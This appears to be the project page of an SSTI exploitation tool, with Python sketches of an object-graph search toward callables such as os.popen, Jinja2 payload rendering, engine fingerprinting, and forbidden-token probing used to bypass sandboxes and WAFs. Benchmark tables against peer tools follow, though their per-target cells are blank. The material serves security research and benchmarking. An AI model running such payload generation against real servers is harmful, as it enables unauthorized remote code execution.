SSTIninja

A constraint-aware Server-Side Template Injection exploitation tool, empirically benchmarked against 4 peer tools across a 10-target corpus (8 vulnerable targets plus 2 negative controls).

Abstract

SSTIninja treats template-injection exploitation as a search problem: a Searcher walks the live Python object graph from a seed value to a callable target (e.g. os.popen), producing an abstract path; a Renderer then turns that path into a payload string under arbitrary syntactic constraints (forbidden chars, banned keywords, length budgets, hardened sandboxes). The two are orthogonal components, allowing payload-shape obfuscation without re-doing search.
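A minimal sketch of the search/render split described above. The function names (`search_path`, `render_jinja2`) and the edge set are illustrative, not SSTIninja's actual API; the call edge really executes zero-argument callables in the local interpreter, which mirrors what the eventual payload does remotely.

```python
from collections import deque

DUNDER_EDGES = ("__class__", "__mro__", "__subclasses__", "__init__", "__globals__")

def search_path(seed, accept, max_depth=5, max_items=64):
    """Breadth-first search over the live object graph. Edges are
    attribute access (str step), indexing (int step), and zero-argument
    calls ("()" step). Returns the first abstract path whose endpoint
    satisfies accept(), or None if the depth budget is exhausted."""
    queue, seen = deque([(seed, [])]), set()
    while queue:
        obj, path = queue.popleft()
        if accept(obj):
            return path
        if len(path) >= max_depth or id(obj) in seen:
            continue
        seen.add(id(obj))
        for name in DUNDER_EDGES:            # attribute edges
            try:
                queue.append((getattr(obj, name), path + [name]))
            except Exception:
                pass
        if isinstance(obj, (tuple, list)):   # index edges
            for i, item in enumerate(obj[:max_items]):
                queue.append((item, path + [i]))
        if callable(obj):                    # zero-arg call edge (runs for real)
            try:
                queue.append((obj(), path + ["()"]))
            except Exception:
                pass
    return None

def render_jinja2(path, seed_expr="''"):
    """Turn an abstract path into a Jinja2 expression. A real renderer
    would apply constraints here (e.g. emit |attr('x') when '.' is
    forbidden); this sketch emits only the plain dotted form."""
    out = seed_expr
    for step in path:
        if step == "()":
            out += "()"
        elif isinstance(step, int):
            out += "[%d]" % step
        else:
            out += "." + step
    return out

# "" --__class__--> str --__mro__--> (str, object) --[1]--> object
path = search_path("", lambda o: o is object)
```

Because the renderer only sees an abstract path, swapping the dotted form for an `|attr()`-filter form (or any other obfuscation) never requires re-running the search.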

The HTTP front-end probes a remote target — fingerprinting the template engine via boundary-marked math probes, mapping forbidden tokens via differential reflection, and optionally enumerating __subclasses__() remotely — then composes a constraint-aware exploit and verifies it via a random sentinel echoed back in the response.
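The two probing ideas can be sketched as follows. The probe table, helper names, and token list are illustrative assumptions, not SSTIninja's real wire format; `fake_send` is a hypothetical stand-in target for local testing.

```python
import re
import secrets

# One expression wrapper per engine family. Tornado shares Jinja2's
# {{ ... }} syntax, so telling them apart needs follow-up probes.
ENGINE_PROBES = {
    "jinja2": "{{%s}}",
    "mako":   "${%s}",
    "erb":    "<%%= %s %%>",
}

def fingerprint(send, a=1105, b=1729):
    """Boundary-marked math probe: only a response containing
    marker + a*b + marker proves the expression was evaluated,
    rather than the product appearing in the page by accident."""
    left, right = secrets.token_hex(4), secrets.token_hex(4)
    for engine, tpl in ENGINE_PROBES.items():
        body = send(left + (tpl % ("%d*%d" % (a, b))) + right)
        if left + str(a * b) + right in body:
            return engine
    return None

def forbidden_tokens(send, candidates=("__", "[", ".", "popen", "subclasses")):
    """Differential reflection: if a bare marker is echoed back but
    marker+token is not, the token is being filtered or blocked."""
    marker = secrets.token_hex(4)
    if marker not in send(marker):
        return set()            # input is never reflected; cannot diff
    return {tok for tok in candidates if marker not in send(marker + tok)}

# Hypothetical stand-in target: evaluates {{x*y}} and blocks "popen".
def fake_send(payload):
    if "popen" in payload:
        return "403 Forbidden"
    return re.sub(r"\{\{(\d+)\*(\d+)\}\}",
                  lambda m: str(int(m.group(1)) * int(m.group(2))), payload)
```

Against `fake_send`, the fingerprint resolves to "jinja2" and the token map comes back as {"popen"}, which is exactly the shape of input the constraint-aware renderer consumes.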

Headline result

On the 9-target local_flask benchmark — covering bare Jinja2, multiple sandbox configurations, a WAF-style filter, two non-Jinja2 engines (Mako, Tornado), and two negative cases — SSTIninja is the only tool to score 100% simultaneously on detection, exploitation, and WAF/sandbox bypass, while averaging 0.09s per target: roughly 2.5× faster than tplmap and 11× faster than sstimap, the other detect+RCE tools.

Per-target results

Each row is one HTTP target; each column is one tool's verdict. ✓/✓ = detected and exploited; ✓/✗ = detected but no RCE.

Local Flask (9 targets)

Target                         Engine (exp)  ours  sstimap  tplmap  nuclei  tinja
flask_jinja2_baseline          jinja2        /     /        /       /       /
flask_jinja2_loose_sandbox     jinja2        /     /        /       /       /
flask_jinja2_narrow_blacklist  jinja2        /     /        /       /       /
flask_jinja2_waf               jinja2        /     /        /       /       /
flask_mako                     mako          /     /        /       /       /
flask_tornado                  tornado       /     /        /       /       /
flask_jinja2_strict_sandbox    jinja2        /     /        /       /       /
flask_no_template_eval         -             /     /        /       /       /
flask_safe_jinja2              -             /     /        /       /       /

Cells: <detected>/<exploited>. The engine each tool actually reported is available on hover; aggregate engine identification accuracy is in the dimensional summary below.

vulhub flask/ssti (1 target)

Target             Engine (exp)  ours  sstimap  tplmap  nuclei  tinja
vulhub_flask_ssti  jinja2        /     /        /       /       /

Cells: <detected>/<exploited>. The engine each tool actually reported is available on hover; aggregate engine identification accuracy is in the dimensional summary below.

Dimensional analysis

Aggregated over the full 10-target corpus. Classes: "ours" is the tool from this repo; "detect+rce" covers tools that do both detection and exploitation; "detect-only" covers detection-only tools (signature scanners / academic analyzers), whose exploitation rate is N/A by design, not a defeat.

Detection rate (true positives)

Fraction of targets with known SSTI that the tool flagged.

Tool     Class        Rate  Count
ours     ours         100%  8/8
sstimap  detect+rce   100%  8/8
tplmap   detect+rce   100%  8/8
nuclei   detect-only  100%  8/8
tinja    detect-only  100%  8/8

False positive rate

Fraction of non-vulnerable targets the tool incorrectly flagged. Lower is better.

Tool     Class        Rate  Count
ours     ours         0%    0/2
sstimap  detect+rce   0%    0/2
tplmap   detect+rce   0%    0/2
nuclei   detect-only  0%    0/2
tinja    detect-only  0%    0/2

Exploitation rate (RCE confirmed)

Fraction of exploit-expected targets where a sentinel was actually echoed by the target.

Tool     Class        Rate  Count
ours     ours         100%  7/7
sstimap  detect+rce   71%   5/7
tplmap   detect+rce   71%   5/7
nuclei   detect-only  0%    0/7
tinja    detect-only  0%    0/7

WAF / weakened-sandbox bypass

Subset rate on hardened targets — WAF, narrow-blacklist, or loose-sandbox endpoints.

Tool     Class        Rate  Count
ours     ours         100%  3/3
sstimap  detect+rce   67%   2/3
tplmap   detect+rce   33%   1/3
nuclei   detect-only  0%    0/3
tinja    detect-only  0%    0/3

Engine identification specificity

Targets where the tool emitted the correct engine label (jinja2 / mako / tornado) instead of a generic catch-all.

Tool     Class        Rate  Count
ours     ours         100%  8/8
tplmap   detect+rce   100%  8/8
tinja    detect-only  100%  8/8
sstimap  detect+rce   75%   6/8
nuclei   detect-only  0%    0/8

Mean wall time per target

Tool     Class        Mean   Total  Targets
ours     ours         0.09s  0.9s   10
tinja    detect-only  0.04s  0.4s   10
tplmap   detect+rce   0.23s  2.3s   10
sstimap  detect+rce   1.02s  10.2s  10
nuclei   detect-only  7.98s  79.8s  10

Peer tools

Peer-tool versions are captured at run time and committed alongside the JSONL records, so every comparison is fully reproducible.

Methodology

Each (target × tool) pair is a single subprocess run with a timeout. Detection is judged from each tool's own success-confirmation output; exploitation is confirmed only by sentinel-in-response (no tool's claim is taken at face value). The full corpus, expected outcomes, and tool adapters are versioned in eval/corpus/ and src/sstininja/eval/peers/; the raw per-(target, tool) records this site reads from are in eval/results/*.jsonl.
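The sentinel-in-response check can be sketched as below. All names here are illustrative assumptions (this is not the harness's real API), and the `{{run:...}}` wrapper of the stand-in targets is purely hypothetical; the point is that a tool's own "I got RCE" claim is ignored, and only a fresh random sentinel printed by the executed command counts.

```python
import re
import secrets

def verify_rce(send, build_payload):
    """build_payload(cmd) -> injection string; send(payload) -> response
    body. Succeeds only when the sentinel printed *by the command* comes
    back, and fails when the body merely reflects our own input (the
    reflected payload still contains the literal 'echo <sentinel>')."""
    sentinel = secrets.token_hex(8)
    body = send(build_payload("echo " + sentinel))
    return sentinel in body and ("echo " + sentinel) not in body

# Hypothetical stand-in targets: one that "executes" the command,
# one that only reflects the payload verbatim.
def executing_target(payload):
    m = re.fullmatch(r"\{\{run:echo (\w+)\}\}", payload)
    return m.group(1) if m else payload

def reflecting_target(payload):
    return payload

def build(cmd):
    return "{{run:" + cmd + "}}"
```

Using a fresh random sentinel per attempt means a cached page, a canned tool banner, or an echoed request body can never be mistaken for code execution.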

Honest limitations